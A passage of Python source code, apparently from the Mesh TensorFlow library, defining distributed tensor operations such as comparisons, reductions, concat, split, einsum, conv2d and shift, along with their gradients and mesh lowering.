and x2 must be an mtf Tensor\")\n elif isinstance(x1, Tensor) and isinstance(x2, Tensor):\n return x1, x2\n elif isinstance(x1, Tensor):\n return x1, import_tf_tensor(\n 
x1.mesh, tf.convert_to_tensor(x2, dtype=x1.dtype), Shape([]))\n else:\n return import_tf_tensor(x2.mesh, tf.convert_to_tensor(x1, dtype=x2.dtype),\n Shape([])), x2\n\n\ndef binary_op_with_broadcasting(\n tf_fn, x1, x2, output_shape=None, output_dtype=None):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n output_shape = _infer_binary_broadcast_shape(x1.shape, x2.shape, output_shape)\n output_dtype = output_dtype or x1.dtype\n assert isinstance(output_dtype, tf.DType)\n return BinaryOpWithBroadcasting(\n tf_fn, x1, x2, convert_to_shape(output_shape),\n output_dtype).outputs[0]\n\n\ndef less(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.less, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef greater(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.greater, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef less_equal(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.less_equal, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef greater_equal(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.greater_equal, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef equal(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.equal, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef not_equal(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.not_equal, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef logical_and(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.logical_and, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef logical_or(x1, x2, output_shape=None):\n return binary_op_with_broadcasting(\n tf.logical_or, x1, x2, output_dtype=tf.bool, output_shape=output_shape)\n\n\ndef floordiv(x1, x2, output_shape=None):\n output_dtype = x1.dtype if isinstance(x1, Tensor) else x2.dtype\n return binary_op_with_broadcasting(\n tf.floordiv, x1, x2, output_dtype=output_dtype, output_shape=output_shape)\n\n\ndef mod(x1, x2, output_shape=None):\n output_dtype = x1.dtype if isinstance(x1, Tensor) else x2.dtype\n return binary_op_with_broadcasting(\n tf.mod, x1, x2, output_dtype=output_dtype, output_shape=output_shape)\n\n\nclass AddOperation(BinaryOpWithBroadcasting):\n \"\"\"Binary addition with broadcasting.\"\"\"\n\n def __init__(self, x1, x2, output_shape, name=None):\n super(AddOperation, self).__init__(\n tf.add, x1, x2, output_shape, x1.dtype, name=name or \"add\")\n if x1.dtype != x2.dtype:\n raise ValueError(\"Dtypes must be equal.\")\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n return [reduce_sum(dy, output_shape=self.inputs[0].shape),\n reduce_sum(dy, output_shape=self.inputs[1].shape)]\n\n\nclass MinMaxOperation(BinaryOpWithBroadcasting):\n \"\"\"Binary minimum/maximum with broadcasting.\"\"\"\n\n def __init__(self, tf_fn, x1, x2, output_shape, name=None):\n super(MinMaxOperation, self).__init__(\n tf_fn, x1, x2, output_shape, x1.dtype, name=name or \"add\")\n if x1.dtype != x2.dtype:\n raise ValueError(\"Dtypes must be equal.\")\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n return [dy * cast(equal(self.inputs[0], self.outputs[0]), dy.dtype),\n dy * cast(equal(self.inputs[1], self.outputs[0]), dy.dtype)]\n\n\ndef minimum(x1, x2, output_shape=None, name=None):\n \"\"\"Binary minimum with broadcsting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n 
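# A minimal usage sketch (hypothetical names; assumes a Graph, Mesh and the\n # constructors above are already in scope):\n #   batch = Dimension(\"batch\", 4)\n #   d = Dimension(\"d\", 8)\n #   x = import_tf_tensor(mesh, tf.zeros([4, 8]), Shape([batch, d]))\n #   y = minimum(x, 0.0)   # the python scalar is imported as a 0-d Tensor\n #   m = less_equal(x, y)  # elementwise comparison; output dtype is tf.bool\n # Output shapes follow _infer_binary_broadcast_shape: if one input shape is a\n # subsequence of the other, the supersequence shape is used.\n 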
output_shape = convert_to_shape(output_shape)\n with tf.name_scope(name, default_name=\"minimum\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return MinMaxOperation(\n tf.minimum, x1, x2, output_shape=_infer_binary_broadcast_shape(\n x1.shape, x2.shape, output_shape)).outputs[0]\n\n\ndef maximum(x1, x2, output_shape=None, name=None):\n \"\"\"Binary maximum with broadcsting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n with tf.name_scope(name, default_name=\"maximum\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return MinMaxOperation(\n tf.maximum, x1, x2, output_shape=_infer_binary_broadcast_shape(\n x1.shape, x2.shape, output_shape)).outputs[0]\n\n\nclass BroadcastOperation(Operation):\n \"\"\"Broadcast - output dims are a superset of input dims, in any order.\"\"\"\n\n def __init__(self, x, output_shape, name=None):\n super(BroadcastOperation, self).__init__([x], name=name or \"broadcast\")\n self._outputs = [Tensor(self, output_shape, x.dtype)]\n\n def gradient(self, grad_ys):\n return [reduce_sum(grad_ys[0], output_shape=self.inputs[0].shape)]\n\n def lower(self, lowering):\n ret = lowering.mesh_impl(self).broadcast_impl(\n lowering.tensors[self.inputs[0]], self.inputs[0].shape,\n self.outputs[0].shape)\n lowering.set_tensor_lowering(self.outputs[0], ret)\n\n\ndef broadcast(x, new_shape):\n return BroadcastOperation(x, new_shape).outputs[0]\n\n\ndef _reduce_helper(input_shape,\n output_shape,\n input_tensor_layout,\n reduction_fn_string=\"SUM\"):\n \"\"\"Returns slicewise function and reduced mesh dimensions.\n\n Args:\n input_shape: a Shape\n output_shape: a Shape\n input_tensor_layout: a TensorLayout\n reduction_fn_string: \"SUM\" or \"MAX\"\n Returns:\n reduce_slice_fn: a function from tf.Tensor to tf.Tensor\n reduced_mesh_axes: a list of integers\n \"\"\"\n reduce_dims_indices = [\n i for i, d in enumerate(input_shape.dims) if d not in output_shape.dims]\n reduced_input_shape = Shape([\n d for d in input_shape.dims if d in output_shape.dims])\n perm = [reduced_input_shape.dims.index(d) for d in output_shape.dims]\n def reduce_slice_fn(xslice):\n ret = xslice\n if reduce_dims_indices:\n ret = reduction_fn(reduction_fn_string)(xslice, reduce_dims_indices)\n if perm != list(xrange(len(perm))):\n ret = tf.transpose(ret, perm)\n return ret\n reduced_mesh_axes = []\n for i in reduce_dims_indices:\n mesh_axis = input_tensor_layout[i]\n if mesh_axis is not None:\n reduced_mesh_axes.append(mesh_axis)\n return reduce_slice_fn, reduced_mesh_axes\n\n\nclass ReduceOperation(Operation):\n \"\"\"Reduction - output dims are a subset of input dims, in any order.\"\"\"\n\n def __init__(self, x, output_shape, reduction_fn_string, name=None):\n super(ReduceOperation, self).__init__([x], name=name or \"reduce\")\n self._outputs = [Tensor(self, output_shape, x.dtype)]\n self._reduction_fn_string = reduction_fn_string\n\n def gradient(self, grad_ys):\n if self._reduction_fn_string == \"SUM\":\n return [broadcast(grad_ys[0], self.inputs[0].shape)]\n elif (self._reduction_fn_string == \"MAX\" or\n self._reduction_fn_string == \"MIN\"):\n return [cast(equal(self.inputs[0], self.outputs[0]), self.inputs[0].dtype)\n * grad_ys[0]]\n else:\n raise ValueError(\"Gradients to other reductions not implemented\")\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n slicewise_fn, reduced_mesh_axes = _reduce_helper(\n self.inputs[0].shape, 
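# input shape: dims missing from the output shape are reduced out\n 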
self.outputs[0].shape,\n mesh_impl.tensor_layout(self.inputs[0]),\n self._reduction_fn_string)\n y = mesh_impl.slicewise(slicewise_fn, lowering.tensors[self.inputs[0]])\n if reduced_mesh_axes:\n def add_counter_fn():\n lowering.add_counter(\"allreduce/%s/reduce_op\" % reduced_mesh_axes,\n lowering.laid_out_size(self.outputs[0]))\n if self._reduction_fn_string == \"SUM\":\n y = LazyAllreduceSum(\n mesh_impl, y, reduced_mesh_axes, add_counter_fn=add_counter_fn)\n else:\n y = mesh_impl.allreduce(\n y, reduced_mesh_axes, self._reduction_fn_string)\n add_counter_fn()\n lowering.set_tensor_lowering(self.outputs[0], y)\n\n\nclass ConcatOperation(Operation):\n \"\"\"tf.concat.\n\n All inputs have the same shape, except for the size of the dimension named\n dim_name.\n \"\"\"\n\n def __init__(self, xs, concat_dim_name, name=None):\n super(ConcatOperation, self).__init__(xs, name=name or \"concat\")\n # verify that the shapes are all compatible\n dim_names = [dim.name for dim in xs[0].shape.dims]\n self._concat_dim_name = concat_dim_name\n\n if concat_dim_name not in dim_names:\n raise ValueError(\"xs[0] does not contain a dimension named dim_name\")\n self._axis = dim_names.index(concat_dim_name)\n\n should_be_equal = [\n x.shape.resize_dimension(concat_dim_name, 0) for x in xs]\n if not all(s == should_be_equal[0] for s in should_be_equal):\n raise ValueError(\"shapes are not compatible %s\" % xs)\n\n self._input_sizes = [x.shape.dims[self._axis].size for x in xs]\n output_size = sum(self._input_sizes)\n self._outputs = [\n Tensor(self, xs[0].shape.resize_dimension(concat_dim_name, output_size),\n xs[0].dtype)]\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n return split(dy, self.outputs[0].shape.dims[self._axis], self._input_sizes)\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(\n Dimension(self._concat_dim_name, 0)) is not None:\n raise ValueError(\"can't concat along split axis\")\n def slicewise_fn(*args):\n return tf.concat(args, axis=self._axis, name=\"concat\")\n y = mesh_impl.slicewise(\n slicewise_fn, *[lowering.tensors[x] for x in self._inputs])\n lowering.set_tensor_lowering(self.outputs[0], y)\n\n\ndef concat(xs, concat_dim_name, name=None):\n \"\"\"Like tf.concat.\n\n All inputs must have equal shape except for the sizes in the concatenated\n dimension. The dimension names should be the same, even that of the\n concatenated dimension.\n\n Args:\n xs: a list of Tensors\n concat_dim_name: a string\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n return ConcatOperation(xs, concat_dim_name, name).outputs[0]\n\n\nclass SplitOperation(Operation):\n \"\"\"like tf.split.\n\n TODO(noam, nikip): this code has never been run. 
Run it and test it.\n \"\"\"\n\n def __init__(self, x, split_dim, num_or_size_splits, name=None):\n super(SplitOperation, self).__init__([x], name=name or \"concat\")\n\n self._split_dim = split_dim\n if split_dim not in x.shape.dims:\n raise ValueError(\"%s does not contain dimension %s\" % (x, split_dim))\n self._axis = x.shape.dims.index(split_dim)\n\n if isinstance(num_or_size_splits, list):\n self._output_sizes = num_or_size_splits\n if sum(num_or_size_splits) != split_dim.size:\n raise ValueError(\n \"Sizes do not add up %s %s\" % (num_or_size_splits, split_dim))\n else:\n assert isinstance(num_or_size_splits, int)\n assert split_dim.size % num_or_size_splits == 0\n self._output_sizes = (\n [split_dim.size / num_or_size_splits] * num_or_size_splits)\n\n self._outputs = [\n Tensor(self, x.shape.resize_dimension(split_dim.name, output_size),\n x.dtype) for output_size in self._output_sizes]\n\n def gradient(self, grad_ys):\n return concat(grad_ys, self._split_dim.name)\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(self._split_dim) is not None:\n raise ValueError(\"can't split along split axis\")\n def slicewise_fn(x):\n # Since we return a tuple of tf.Tensor, slicewise will collate the\n # outputs and return a tuple of LaidOutTensors.\n return tuple(tf.split(x, self._output_sizes, axis=self._axis))\n values = mesh_impl.slicewise(\n slicewise_fn, lowering.tensors[self.inputs[0]])\n for t, v in zip(self._outputs, values):\n lowering.set_tensor_lowering(t, v)\n\n\ndef split(x, split_dim, num_or_size_splits, name=None):\n \"\"\"Like tf.split.\n\n Args:\n x: a Tensor\n split_dim: a Dimension in x.shape.dims\n num_or_size_splits: either an integer dividing split_dim.size\n or a list of integers adding up to split_dim.size\n name: an optional string\n Returns:\n a list of Tensors.\n \"\"\"\n return SplitOperation(x, split_dim, num_or_size_splits, name=name).outputs\n\n\nclass StackOperation(Operation):\n \"\"\"Like tf.stack.\"\"\"\n\n def __init__(self, xs, dim_name, axis, name=None):\n super(StackOperation, self).__init__(xs, name=name or \"stack\")\n self._axis = axis\n self._new_dim = Dimension(dim_name, len(xs))\n input_shape = xs[0].shape\n for x in xs:\n if x.shape != xs[0].shape:\n raise ValueError(\n \"inputs to stack must have the same shape, got %s\" % xs)\n output_shape = Shape(\n input_shape.dims[:axis] + [self._new_dim]+ input_shape.dims[axis:])\n self._outputs = [Tensor(self, output_shape, xs[0].dtype)]\n\n def gradient(self, grad_ys):\n return unstack(grad_ys[0], self._new_dim)\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(self._new_dim) is not None:\n raise ValueError(\"can't stack along split axis\")\n inputs = [lowering.tensors[t] for t in self._inputs]\n def slicewise_fn(*args):\n return tf.stack(args, axis=self._axis)\n ret = mesh_impl.slicewise(slicewise_fn, *inputs)\n lowering.set_tensor_lowering(self.outputs[0], ret)\n\n\ndef stack(xs, dim_name, axis, name=None):\n \"\"\"Stack multiple Tensors to make a new dimension.\n\n Args:\n xs: a list of Tensors with identical shapes.\n dim_name: a string (name of the new dimension)\n axis: an integer (index of the new dimension in the output shape)\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n ret = StackOperation(xs, dim_name, axis, name).outputs[0]\n return ret\n\n\nclass UnstackOperation(Operation):\n \"\"\"Split into multiple Tensors, eliminating a dimension.\"\"\"\n\n def 
__init__(self, x, dim, name=None):\n super(UnstackOperation, self).__init__([x], name=name or \"unstack\")\n self._dim = dim\n self._axis = x.shape.dims.index(dim)\n output_shape = x.shape - dim\n self._outputs = [\n Tensor(self, output_shape, x.dtype) for _ in xrange(dim.size)]\n\n def gradient(self, grad_ys):\n return [stack(grad_ys, self._dim.name, self._axis)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if mesh_impl.tensor_dimension_to_mesh_axis(self._dim) is not None:\n raise ValueError(\"can't unstack along split axis\")\n def slicewise_fn(x):\n return tuple(tf.unstack(x, num=self._dim.size, axis=self._axis))\n output_values = mesh_impl.slicewise(\n slicewise_fn, lowering.tensors[self._inputs[0]])\n for t, v in zip(self.outputs, list(output_values)):\n lowering.set_tensor_lowering(t, v)\n\n\ndef unstack(x, dim, name=None):\n \"\"\"Split into multiple Tensors, eliminating a dimension.\n\n Args:\n x: a Tensor\n dim: a Dimension\n name: an optional string\n\n Returns:\n a list of dim.size Tensors, each with shape (x.shape - dim)\n \"\"\"\n return UnstackOperation(x, dim, name).outputs\n\n\ndef cumsum(x, dim, exclusive=False):\n \"\"\"Cumulative sum.\n\n Args:\n x: a Tensor\n dim: a Dimension\n exclusive: a boolean\n\n Returns:\n a Tensor with the same shape as x.\n \"\"\"\n new_name = \"tmp_dim_cumsum\"\n new_dim = Dimension(new_name, dim.size)\n new_shape = x.shape.rename_dimension(dim.name, new_name)\n comparator = less if exclusive else less_equal\n m = cast(\n comparator(range(x.mesh, dim, dtype=tf.float32),\n range(x.mesh, new_dim, dtype=tf.float32)), x.dtype)\n ret = einsum([x, m], output_shape=new_shape)\n return reshape(ret, x.shape)\n\n\ndef _einsum_helper(input_shapes, output_shape, mesh_impl):\n \"\"\"Returns slicewise function and reduced mesh dimensions.\n\n Assumes the output shape contains no new dimensions.\n\n Args:\n input_shapes: a list of Shapes\n output_shape: a Shape\n mesh_impl: a MeshImpl\n Returns:\n einsum_slice_fn: a function from tf.Tensors to tf.Tensor\n reduced_mesh_axes: a list of integers\n \"\"\"\n input_shape_union = _shape_union(input_shapes)\n total_num_dims = input_shape_union.ndims\n # list of input shapes that contain all dimensions.\n full_shapes = [\n s for s in input_shapes + [output_shape] if s.ndims == total_num_dims]\n full_shape = full_shapes[0] if full_shapes else input_shape_union\n reduce_slice_fn, reduced_mesh_axes = _reduce_helper(\n full_shape, output_shape, mesh_impl.tensor_layout(full_shape))\n def einsum_slice_fn_naive(*slices):\n # naive einsum implementation where we broadcst all inputs to the full\n # shape, multiply componentwise, then reduce.\n return reduce_slice_fn(reduce(tf.multiply, [\n _expand_dims(x, input_shape, full_shape)\n for x, input_shape in zip(slices, input_shapes)]))\n if full_shapes:\n # it is not wasteful of space to broadcast fully and then reduce.\n # this helps to avoid some inefficient GPU implementations.\n einsum_slice_fn = einsum_slice_fn_naive\n else:\n # call tf.einsum\n equation = _einsum_equation(input_shapes, output_shape)\n def einsum_slice_fn(*slices):\n if slices[0].dtype.is_floating:\n return tf.einsum(equation, *slices)\n else:\n return einsum_slice_fn_naive(*slices)\n return einsum_slice_fn, reduced_mesh_axes\n\n\nclass EinsumOperation(Operation):\n \"\"\"Einstein summation (matmul, etc).\n\n The equation follows the dimensions in the input and output shapes.\n\n Every dimension must occur in at least two of the input/output Tensors.\n i.e. 
no new dimensions in the output, and no reduction of dimensions that\n occur in only one input.\n \"\"\"\n\n def __init__(self, inputs, output_shape, name=None):\n super(EinsumOperation, self).__init__(inputs, name=name or \"einsum\")\n if not inputs:\n raise ValueError(\"Einsum needs at least one input\")\n for x in inputs:\n if x.dtype != inputs[0].dtype:\n raise ValueError(\"Input dtypes must be equal\")\n self._outputs = [Tensor(self, output_shape, inputs[0].dtype)]\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n xs = self.inputs\n return [\n einsum([dy] + [xs[j] for j in xrange(len(xs)) if j != i], xs[i].shape)\n for i in xrange(len(self.inputs))]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n xs = self.inputs\n input_shape_set = set(sum([x.shape.dims for x in xs], []))\n output_shape = self.outputs[0].shape\n intersection_shape = Shape(\n [d for d in output_shape.dims if d in input_shape_set])\n einsum_slice_fn, reduced_mesh_axes = _einsum_helper(\n [x.shape for x in self.inputs], intersection_shape, mesh_impl)\n y = mesh_impl.slicewise(\n einsum_slice_fn, *[lowering.tensors[x] for x in self.inputs])\n if reduced_mesh_axes:\n def add_counter_fn():\n lowering.add_counter(\n \"allreduce/%s/einsum_op\" % reduced_mesh_axes,\n mesh_impl.laid_out_size(intersection_shape))\n y = LazyAllreduceSum(\n mesh_impl, y, reduced_mesh_axes, add_counter_fn=add_counter_fn)\n # broadcast from intersection_shape to output_shape\n if intersection_shape != output_shape:\n y = mesh_impl.broadcast_impl(y, intersection_shape, output_shape)\n lowering.set_tensor_lowering(self.outputs[0], y)\n computation_shape = Shape(list(input_shape_set))\n lowering.add_counter(\"einsum\", mesh_impl.laid_out_size(computation_shape))\n lowering.add_counter(\"einsum_unique\", computation_shape.size)\n\n\nclass Conv2dOperation(Operation):\n \"\"\"like tf.nn.conv2d.\n\n Always data format \"NHWC\".\n # TODO(nikip): support dilations\n Always dilation rate of 1\n padding: \"SAME\" or \"VALID\"\n\n TODO(noam): implement more options.\n \"\"\"\n\n def __init__(self, conv_input, conv_filter, strides, padding, name=None):\n super(Conv2dOperation, self).__init__(\n [conv_input, conv_filter], name=name or \"conv2d\")\n self._padding = padding\n self._batch_dims = conv_input.shape.dims[:-3]\n self._in_h_dim, self._in_w_dim, self._in_dim = conv_input.shape.dims[-3:]\n self._fh_dim, self._fw_dim = conv_filter.shape.dims[:2]\n f_in_dim, self._out_dim = conv_filter.shape.dims[2:]\n if f_in_dim != self._in_dim:\n raise ValueError(\"Dimensions do not match input=%s filter=%s\"\n % (conv_input, conv_filter))\n out_h = self._in_h_dim.size\n out_w = self._in_w_dim.size\n if padding == \"VALID\":\n out_h -= (self._fh_dim.size - 1)\n out_w -= (self._fw_dim.size - 1)\n\n self._strides = strides\n if strides is not None:\n out_h //= strides[1]\n out_w //= strides[2]\n self._out_h_dim = Dimension(self._in_h_dim.name, out_h)\n self._out_w_dim = Dimension(self._in_w_dim.name, out_w)\n output_shape = Shape(\n self._batch_dims + [self._out_h_dim, self._out_w_dim, self._out_dim])\n self._outputs = [Tensor(self, output_shape, conv_input.dtype)]\n\n def gradient(self, grad_ys):\n dy = grad_ys[0]\n conv_input, conv_filter = self.inputs\n return [\n conv2d_backprop_input(self._inputs[0].shape,\n conv_filter,\n dy,\n self._strides,\n self._padding),\n conv2d_backprop_filter(conv_input,\n self._inputs[1].shape,\n dy,\n self._strides,\n self._padding)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n 
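# Lowering sketch: the spatial (h, w) and filter (fh, fw) dimensions must not\n # be split across the mesh; each processor runs tf.nn.conv2d on its own\n # slice, and if the input-channel dimension is split, the partial sums are\n # combined with a lazy allreduce below.\n 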
conv_input, conv_filter = self.inputs\n if mesh_impl.tensor_dimension_to_mesh_axis(self._in_h_dim) is not None:\n raise ValueError(\"can't slice along dimension h\")\n if mesh_impl.tensor_dimension_to_mesh_axis(self._in_w_dim) is not None:\n raise ValueError(\"can't slice along dimension w\")\n if mesh_impl.tensor_dimension_to_mesh_axis(self._fh_dim) is not None:\n raise ValueError(\"can't slice along dimension fh\")\n if mesh_impl.tensor_dimension_to_mesh_axis(self._fw_dim) is not None:\n raise ValueError(\"can't slice along dimension fw\")\n def tf_fn(tf_input, tf_filter):\n output = tf.nn.conv2d(\n _tf_flatten_batch_dims(tf_input, 3),\n tf_filter, self._strides, self._padding)\n return _tf_restore_batch_dims(output, 3, tf_input)\n y = mesh_impl.slicewise(\n tf_fn, lowering.tensors[conv_input], lowering.tensors[conv_filter])\n # reducing out input channels - may need to allreduce\n in_mesh_axis = mesh_impl.tensor_dimension_to_mesh_axis(self._in_dim)\n if in_mesh_axis is not None:\n def add_counter_fn():\n lowering.add_counter(\n \"allreduce/%s/conv2d_op\" % [in_mesh_axis],\n mesh_impl.laid_out_size(self.outputs[0].shape))\n y = LazyAllreduceSum(mesh_impl, y, [in_mesh_axis], add_counter_fn)\n lowering.set_tensor_lowering(self.outputs[0], y)\n computation_shape = _shape_union([conv_filter.shape, self.outputs[0].shape])\n lowering.add_counter(\"conv2d/forward\",\n mesh_impl.laid_out_size(computation_shape))\n lowering.add_counter(\"conv2d_unique/forward\", computation_shape.size)\n\n\ndef conv2d(conv_input, conv_filter, strides, padding, name=None):\n \"\"\"conv2d.\"\"\"\n return Conv2dOperation(\n conv_input, conv_filter, strides, padding, name=name).outputs[0]\n\n\nclass Conv2dBackpropInputOperation(Operation):\n \"\"\"like tf.nn.conv2d_backprop_input\"\"\"\n\n def __init__(self, input_shape, conv_filter, dy, strides, padding, name=None):\n super(Conv2dBackpropInputOperation, self).__init__(\n [dy, conv_filter], name=name or \"conv2d_backprop\")\n self._padding = padding\n self._strides = strides\n self._input_shape = input_shape\n self._outputs = [Tensor(self, input_shape, dy.dtype)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n dy, conv_filter = self.inputs\n input_sizes = mesh_impl.slice_shape(self.outputs[0].shape)\n input_sizes = [list_product(input_sizes[:-3])] + input_sizes[-3:]\n def tf_fn(tf_dy, tf_filter):\n return _tf_restore_batch_dims(\n tf.nn.conv2d_backprop_input(\n input_sizes, tf_filter, _tf_flatten_batch_dims(tf_dy, 3),\n self._strides, self._padding), 3, tf_dy)\n dx = mesh_impl.slicewise(\n tf_fn, lowering.tensors[dy], lowering.tensors[conv_filter])\n # reducing out output channels - may need to allreduce\n out_mesh_axis = mesh_impl.tensor_dimension_to_mesh_axis(dy.shape.dims[-1])\n if out_mesh_axis is not None:\n def add_counter_fn():\n lowering.add_counter(\n \"allreduce/%s/conv2d_op\" % [out_mesh_axis],\n mesh_impl.laid_out_size(self.outputs[0].shape))\n dx = LazyAllreduceSum(mesh_impl, dx, [out_mesh_axis], add_counter_fn)\n lowering.set_tensor_lowering(self.outputs[0], dx)\n computation_shape = _shape_union([conv_filter.shape, dy.shape])\n lowering.add_counter(\"conv2d/backprop_input\",\n mesh_impl.laid_out_size(computation_shape))\n lowering.add_counter(\"conv2d_unique/backprop_input\", computation_shape.size)\n\n\ndef conv2d_backprop_input(input_shape,\n conv_filter,\n dy,\n strides,\n padding, name=None):\n return Conv2dBackpropInputOperation(input_shape,\n conv_filter,\n dy,\n strides,\n padding,\n name=name).outputs[0]\n\n\nclass 
Conv2dBackpropFilterOperation(Operation):\n \"\"\"like tf.nn.conv2d_backprop_filter.\"\"\"\n\n def __init__(self, conv_input, filter_shape, dy, strides, padding, name=None):\n super(Conv2dBackpropFilterOperation, self).__init__(\n [conv_input, dy], name=name or \"conv2d_backprop_filter\")\n self._padding = padding\n self._strides = strides\n self._filter_shape = filter_shape\n self._outputs = [Tensor(self, filter_shape, dy.dtype)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n conv_input, dy = self.inputs\n filter_sizes = mesh_impl.slice_shape(self.outputs[0].shape)\n def tf_fn(tf_input, tf_dy):\n return tf.nn.conv2d_backprop_filter(\n _tf_flatten_batch_dims(tf_input, 3), filter_sizes,\n _tf_flatten_batch_dims(tf_dy, 3), self._strides, self._padding)\n df = mesh_impl.slicewise(\n tf_fn, lowering.tensors[conv_input], lowering.tensors[dy])\n\n # reducing out batch dimensions - may need to allreduce\n reduced_mesh_axes = [\n mesh_impl.tensor_dimension_to_mesh_axis(d)\n for d in dy.shape.dims[:-3]]\n reduced_mesh_axes = [a for a in reduced_mesh_axes if a is not None]\n\n if reduced_mesh_axes:\n def add_counter_fn():\n lowering.add_counter(\n \"allreduce/%s/conv2d_backprop_filter\" % (reduced_mesh_axes,),\n mesh_impl.laid_out_size(self.outputs[0].shape))\n df = LazyAllreduceSum(mesh_impl, df, reduced_mesh_axes, add_counter_fn)\n\n lowering.set_tensor_lowering(self.outputs[0], df)\n computation_shape = _shape_union([self.outputs[0].shape, dy.shape])\n lowering.add_counter(\"conv2d/backprop_filter\",\n mesh_impl.laid_out_size(computation_shape))\n lowering.add_counter(\n \"conv2d_unique/backprop_filter\", computation_shape.size)\n\n\ndef conv2d_backprop_filter(conv_input,\n filter_shape,\n dy,\n strides,\n padding, name=None):\n return Conv2dBackpropFilterOperation(conv_input,\n filter_shape,\n dy,\n strides,\n padding,\n name=name).outputs[0]\n\n\nclass ShiftOperation(Operation):\n \"\"\"Shift by a static offset in one dimension.\"\"\"\n\n def __init__(self, x, offset, dim, wrap, name=None):\n \"\"\"Create a shift operation.\n\n Shift x right by +offset in dimension dim.\n If offset is negative, shift left.\n If wrap is true then wrap-around. 
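For example, [1, 2, 3] shifted right by 1 with wrap becomes [3, 1, 2].\n 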
Else, pad with zeros.\n\n Args:\n x: a Tensor\n offset: an integer\n dim: a Dimension of x\n wrap: a boolean - whether to wrap or pad.\n name: an optional string\n \"\"\"\n super(ShiftOperation, self).__init__([x], name=name or \"shift\")\n self._dim = dim\n self._axis = x.shape.dims.index(dim)\n self._offset = offset\n self._wrap = wrap\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n\n def gradient(self, grad_ys):\n return [shift(grad_ys[0], -self._offset, self._dim, self._wrap)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n mesh_axis = mesh_impl.tensor_dimension_to_mesh_axis(self._dim)\n inputs = self._inputs[0]\n ndims = self._inputs[0].shape.ndims\n axis = self._axis\n dim = self._dim\n lowered_x = lowering.tensors[inputs]\n def my_slice(x, start, size):\n begin = [0] * axis + [start] + [0] * (ndims - axis - 1)\n size = [-1] * axis + [size] + [-1] * (ndims - axis - 1)\n return tf.slice(x, begin, size)\n if mesh_axis is None:\n def slicewise_fn(x):\n \"\"\"Slicewise function.\"\"\"\n def my_pad(s, begin_pad, end_pad):\n paddings = ([[0, 0]] * axis + [[begin_pad, end_pad]]\n + [[0, 0]] * (ndims - axis - 1))\n return tf.pad(s, paddings)\n if self._wrap:\n offset = self._offset % dim.size\n return tf.concat([my_slice(x, dim.size - offset, offset),\n my_slice(x, 0, dim.size - offset)], axis=axis)\n elif self._offset > 0:\n return my_pad(\n my_slice(x, 0, dim.size - self._offset), self._offset, 0)\n else:\n neg_offset = -self._offset\n return my_pad(\n my_slice(x, neg_offset, dim.size - neg_offset), 0, neg_offset)\n lowered_y = mesh_impl.slicewise(slicewise_fn, lowered_x)\n else:\n mesh_dim_size = mesh_impl.shape.dims[mesh_axis].size\n tensor_dim_size = self._dim.size\n block_size = tensor_dim_size // mesh_dim_size\n odiv = self._offset // block_size\n omod = self._offset % block_size\n laid_out_size = mesh_impl.laid_out_size(inputs.shape)\n if omod == 0:\n # shift by an integral number of processors.\n lowered_y = mesh_impl.shift_by_n_processors(\n lowered_x, mesh_axis, odiv, self._wrap)\n lowering.add_counter(\"shift[%d]\" % odiv, laid_out_size)\n else:\n # shift by odiv processors + omod positions\n sliced = mesh_impl.slicewise(\n lambda x: my_slice(x, 0, block_size - omod), lowered_x)\n second_part = mesh_impl.shift_by_n_processors(\n sliced, mesh_axis, odiv, self._wrap)\n lowering.add_counter(\n \"shift[%d]\" % odiv,\n laid_out_size * (block_size - omod) // block_size)\n sliced = mesh_impl.slicewise(\n lambda x: my_slice(x, block_size - omod, omod), lowered_x)\n first_part = mesh_impl.shift_by_n_processors(\n sliced, mesh_axis, odiv + 1, self._wrap)\n lowered_y = mesh_impl.slicewise(\n lambda a, b: tf.concat([a, b], axis), first_part, second_part)\n lowering.add_counter(\n \"shift[%d]\" % (odiv + 1), laid_out_size * omod // block_size)\n lowering.set_tensor_lowering(self.outputs[0], lowered_y)\n\n\ndef shift(x, offset, dim, wrap, name=None):\n \"\"\"Shift operation.\n\n Shift x right by +offset in dimension 